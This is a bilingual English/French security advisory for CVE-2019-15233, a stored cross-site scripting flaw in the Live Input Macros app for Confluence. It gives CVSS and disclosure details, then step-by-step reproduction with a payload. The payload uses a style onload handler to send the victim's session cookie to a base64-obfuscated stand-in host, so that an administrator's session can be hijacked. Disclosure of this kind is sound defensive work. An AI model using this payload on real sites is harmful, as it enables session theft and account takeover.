
(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233
(FAB-2019-00157) Vulnérabilité découverte par moi CVE-2019-15233
Avis : advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
Cette vulnérabilité de sécurité a été découverte par Francesco Emanuel Bennici [email protected] de FABMation GmbH.
Live Input Macros donne aux utilisateurs la possibilité d'ajouter des cases à cocher, des boutons radio, des listes déroulantes et plus encore à vos pages Confluence et d'apporter des modifications sans modifier la page.
Un attaquant peut exécuter du code JavaScript sur le site Confluence si un utilisateur ajoute le code malveillant.
Cela peut être utilisé pour voler le cookie de session d'un (par exemple) administrateur (détournement de session).
Copiez ce contenu :
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
Et créez un nouvel élément sur une page Confluence. Collez ce texte dedans et partagez la page Confluence avec (par exemple) un administrateur système et s'il accède au site, vous pouvez détourner/« copier » sa session.